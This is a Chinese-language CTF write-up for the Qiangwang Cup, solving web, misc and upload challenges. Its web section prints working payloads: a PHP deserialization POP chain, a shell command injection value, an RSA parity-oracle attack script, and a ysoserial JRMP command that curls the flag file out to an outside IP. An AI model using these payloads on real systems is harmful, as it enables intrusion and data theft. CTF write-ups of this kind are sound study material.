强网杯wp

Web

web辅助

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php
class topsolo{
protected $name;
public function __construct($name = 'Riven'){
$this->name = $name;
}
public function TP(){
if (gettype($this->name) === "function" or gettype($this->name) === "object"){
$name = $this->name;
$name();
}
}
public function __destruct(){
$this->TP();
}
}
class midsolo{
protected $name;
public function __construct($name){
$this->name = $name;
}
public function __wakeup(){
if ($this->name !== 'Yasuo'){
$this->name = 'Yasuo';
echo "No Yasuo! No Soul!\n";
}
}
public function __invoke(){
$this->Gank();
}
public function Gank(){
if (stristr($this->name, 'Yasuo')){
echo "Are you orphan?\n";
}
else{
echo "Must Be Yasuo!\n";
}
}
}
class jungle{
protected $name = "";
public function __construct($name = "Lee Sin"){
$this->name = $name;
}

public function KS(){
system("cat /etc/passwd");
}
public function __toString(){
$this->KS();
return "";
}

}
$c=new jungle();
$a=new midsolo($c);
$b=new topsolo($a);

echo urlencode(serialize($b));
//echo serialize($b);
1
2
3
4
5
exp:

http://eci-2ze4ul2uuvo1j4rae5se.cloudeci1.ichunqiu.com/?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=;S:7:"\00*\00pass";O:7:"topsolo":1:{S:7:"\00*\00\6eame";O:7:"midsolo":2:{S:7:"\00*\00\6eame";O:6:"jungle":1:{S:7:"\00*\00\6eame";s:7:"Lee+Sin";}}}

访问下play.php

Fun hash

1
http://39.101.177.96/?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop

Bank

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import hashlib
import random
import string
import multiprocessing
import time
import datetime
from multiprocessing import Value
aa = "8nzDVPLL4qKshwHxD"
bb = "743a942a1fc456df8fe92046c124e45abf2a75739838f602a541d27741419b2d"

def work(houzhui,hash):
for i in range(100000000):
s = string.printable
xx = random.choice(s)+random.choice(s)+random.choice(s)
aa = xx+houzhui
sha256 = hashlib.sha256()
sha256.update(aa.encode('utf-8'))
res = sha256.hexdigest()
if res==hash:
print("sha256加密结果:",xx)
break

if __name__=='__main__':
cipher = raw_input('sha256:')
weishu = raw_input('hash:')
hash = Value('i',0)
pool_list = []
for i in range(0,10):
p = multiprocessing.Process(target=work,args=(cipher,weishu))
pool_list.append(p)
for i in pool_list:
i.start()
for i in pool_list:
i.join()

主动

1
http://39.96.23.228:10002/?ip=|cat%20?lag.php

webcry

模数为3的RSA parity oracle

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/env python
import requests
import gmpy2, time, decimal
from Crypto.Util.number import long_to_bytes, bytes_to_long

url = "http://106.14.66.189/abi.php"
headers = {
'Cookie':"PHPSESSID=thaf2g7rq7n1cafm86edihe7vd; encrypto_flag=44789525312956413906892336250587100901785996197706985366356847255133267195692846768617452847582513676269061482969582482095141594794433479479926777821516456699901260341298945007995333484920041363377993029238678007418633698524067991348058422339209572846782559138462021462105307254461623915829960261779837027109; public_n=8f5dc00ef09795a3efbac91d768f0bff31b47190a0792da3b0d7969b1672a6a6ea572c2791fa6d0da489f5a7d743233759e8039086bc3d1b28609f05960bd342d52bffb4ec22b533e1a75713f4952e9075a08286429f31e02dbc4a39e3332d2861fc7bb7acee95251df77c92bd293dac744eca3e6690a7d8aaf855e0807a1157; public_e=010001"
}
data = {'this[is.able': 4}
res = requests.post(url,headers=headers,data=data)

e = 0x10001
n = 0x8f5dc00ef09795a3efbac91d768f0bff31b47190a0792da3b0d7969b1672a6a6ea572c2791fa6d0da489f5a7d743233759e8039086bc3d1b28609f05960bd342d52bffb4ec22b533e1a75713f4952e9075a08286429f31e02dbc4a39e3332d2861fc7bb7acee95251df77c92bd293dac744eca3e6690a7d8aaf855e0807a1157
c = 44789525312956413906892336250587100901785996197706985366356847255133267195692846768617452847582513676269061482969582482095141594794433479479926777821516456699901260341298945007995333484920041363377993029238678007418633698524067991348058422339209572846782559138462021462105307254461623915829960261779837027109


def oracle(c1):
data = {'this[is.able': c1}
res = requests.post(url,headers=headers,data=data)
text = res.text
num = text[7]
return int(num)
mab = {}

for i in range(0, 3):
mab[-n * i % 3] = i
print(mab)
# exit
def partial(c, e, n):
lb = 0
ub = n
i = 0
while ub > lb:
print(i, hex(lb), hex(ub))
c = (pow(3, e) * c) % n
b = oracle(c)
k = mab[b]
interval = (ub-lb) // 3
lb = lb + interval * k
ub = lb + interval
i+=1
print(long_to_bytes(ub))
return ub

partial(c, e, n)

easy_java

1
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9090 CommonsCollections5 'curl -F "a=@/flag" http://203.195.224.127:2333'
1
java -jar ysoserial.jar JRMPClient '203.195.224.127:9090' > jrmp1

记得用json传

Misc

miscstudy

访问http://39.99.247.28/fonts/1,得到flag1 flag{level1_begin_and_level2_is_come

得到ssl key log file,把log file 导入Wireshark,可以解密出一个http流量包,链接为https://www.qiangwangbei.com/images/4e5d47b2db53654959295bba216858932.png

可以看到11块有一个base64,解码得到flag3 level3_start_it

提取第八第九第十块,通过https://www.base64decode.net/这个网站解码得到如下

1
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111110000000100110000100000000011100001111111111100001111111111110000000110111000100000000011100001111111111100001100000000110010011111110010000000001100111001000000000100001100000000110010000110110010000000000001111001000000000100001100111100110010000100110010011100000011101001001111100100001100111100110000100000001110011111110010000001001111100100001100111100110000000000001110011110110010000001001111100100001100111100110011100100111111111100110011100000001111100100001100000000110011000000000111100110110110000001000000000100001100000000110010011000000011100011111110011001000000000100001111111111110010011001001001100110110010011001111111111100001111111111110010011001001100000100110010011001111111111100000000000000000010011111110010011000111000100000000000000000000000000000000010001111100010011000011101100000000000000000001110011000111100000001000000011000001111111001111000111000000110000000000000000001000000011000000000011001000000000000000010000001000011100001000000111100110000011000000010000000001110011001111110000000000000010001001110011111000010011000001110011001111110000000000000011001001110011111000010011000001100111000000011111000000010000100000100100111000000100100000001100000000111011000000111000100001100000111000000000000000011100000111110011000001111111100001100011111110010000000000000111001001100000000001100000111001110011111001000100100000000111001001000000000001000000111001110011111001100100100000011100000110011111111000000011100001111111000001110011100000011000000010011111110000000011100001111111000000110001100000000000100000010000000000000011000001110011001000000100100000000000000000110000000000000000000001110011011100000000000000010001001111110000100000000100000011111111101111100000000000011000000001110000000111111100110000001100000000010000000000011100000001110000000111111100111000000100000000010000000001110000100111111111111000000011100111000011000001100000000001111000110001001100111000000011000011100011000000000000000001111100111001100100101111111111001111100001001110011111100001100000111110000100000000010000000111100011000000011100100001000000111110000100000000010000000111000011000000011100100000011011100000011100000000000000001110000011111000001100100000111111100000011000000000000000011100000001101000000100100001111100000110010000100000000011111000010000000001100010000000111100000000010000110000000000000000110000000001100000000000011100100000010011111000011100000001110000000111000100000001100111000111110011111001111111100001010011111111100011000001000111000111110011111001111111100001110011011111100011000000000000000000010011001001110000001110001111000001100000100000000000000000010011000001100000000110000011000001100000100001111111111110010011000111000110000111100011001001100111100001100000000110000111100000011111111001110001000001100111000001100000000110000111100000011111111001110011000001100111000001100111100110000100001000000100001001110011111111100000000001100111100110000100001000001100001001100001111111000000000001100111100110010011000111111111000111110000111000011011100001100111100110000011000110000000000000110000000000011011100001100111100110000011111110000000100001110011000000000011100001100000000110011100100111000011001111100011111111111100000001100000000110011100100111000011001111100011111111111100000001011111111010010011111110011111001001110011111100000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from PIL import Image, ImageDraw, ImageFilter

s = b"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111110000000100110000100000000011100001111111111100001111111111110000000110111000100000000011100001111111111100001100000000110010011111110010000000001100111001000000000100001100000000110010000110110010000000000001111001000000000100001100111100110010000100110010011100000011101001001111100100001100111100110000100000001110011111110010000001001111100100001100111100110000000000001110011110110010000001001111100100001100111100110011100100111111111100110011100000001111100100001100000000110011000000000111100110110110000001000000000100001100000000110010011000000011100011111110011001000000000100001111111111110010011001001001100110110010011001111111111100001111111111110010011001001100000100110010011001111111111100000000000000000010011111110010011000111000100000000000000000000000000000000010001111100010011000011101100000000000000000001110011000111100000001000000011000001111111001111000111000000110000000000000000001000000011000000000011001000000000000000010000001000011100001000000111100110000011000000010000000001110011001111110000000000000010001001110011111000010011000001110011001111110000000000000011001001110011111000010011000001100111000000011111000000010000100000100100111000000100100000001100000000111011000000111000100001100000111000000000000000011100000111110011000001111111100001100011111110010000000000000111001001100000000001100000111001110011111001000100100000000111001001000000000001000000111001110011111001100100100000011100000110011111111000000011100001111111000001110011100000011000000010011111110000000011100001111111000000110001100000000000100000010000000000000011000001110011001000000100100000000000000000110000000000000000000001110011011100000000000000010001001111110000100000000100000011111111101111100000000000011000000001110000000111111100110000001100000000010000000000011100000001110000000111111100111000000100000000010000000001110000100111111111111000000011100111000011000001100000000001111000110001001100111000000011000011100011000000000000000001111100111001100100101111111111001111100001001110011111100001100000111110000100000000010000000111100011000000011100100001000000111110000100000000010000000111000011000000011100100000011011100000011100000000000000001110000011111000001100100000111111100000011000000000000000011100000001101000000100100001111100000110010000100000000011111000010000000001100010000000111100000000010000110000000000000000110000000001100000000000011100100000010011111000011100000001110000000111000100000001100111000111110011111001111111100001010011111111100011000001000111000111110011111001111111100001110011011111100011000000000000000000010011001001110000001110001111000001100000100000000000000000010011000001100000000110000011000001100000100001111111111110010011000111000110000111100011001001100111100001100000000110000111100000011111111001110001000001100111000001100000000110000111100000011111111001110011000001100111000001100111100110000100001000000100001001110011111111100000000001100111100110000100001000001100001001100001111111000000000001100111100110010011000111111111000111110000111000011011100001100111100110000011000110000000000000110000000000011011100001100111100110000011111110000000100001110011000000000011100001100000000110011100100111000011001111100011111111111100000001100000000110011100100111000011001111100011111111111100000001011111111010010011111110011111001001110011111100000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

width = 60
height = 60
img = Image.new('RGB', (width, height), (0, 0, 0))
draw = ImageDraw.Draw(img)

index = 0
for y in range(height):
for x in range(width):
if s[index] == 0x30:
draw.point((x, y), fill=(255, 255, 255))
else:
draw.point((x, y), fill=(0, 0, 0))
index += 1

img.save('bmp5.bmp', 'bmp')

得到一个二维码,扫描得到如下

链接:https://pan.baidu.com/s/1wVJ7d0RLW8Rj-HOTL9Shug

提取码:1lms

打开压缩包的图片,经过stegbreak爆破密码得到

通过jphs解密得到

解密得到flag4 level4_here_all

https://pan.baidu.com/s/1o43y4UGkm1eP-RViC25aOw mrpt

解压得到flag 5 level5_is_aaa

接下来crc32爆破,得到flag6 level6_isready

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import binascii

def str2num(s):
return int(s, 16)
dic = ''_abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'''
#crc1= str2num("9aeacc13")
#crc2= str2num("eed7e184")
crc3= str2num("289585af")
for x in dic:
for a in dic:
for b in dic:
for c in dic:
for d in dic:
str = x+a+b+c+d
str_crc = binascii.crc32(str)& 0xffffffff
if (str_crc==crc3):
print "crc3:",str

接下来用level5多出来的那个图片进行明文攻击,要用好压。。。

接下来是盲水印

接下里是html隐写,密码如下

最终flag

1
flag{level1_begin_and_level2_is_comelevel3_start_itlevel4_here_alllevel5_is_aaalevel6_isreadylevel7isherethe_misc_examaaaaaaa_!!!}

upload

流量包导出对象,foremost一下得到一张图片steghide extract -sf 00000000.jpg密码试了几个,123456成功了导出flag.txt

END

image-20200824173705000

线下见,求轻虐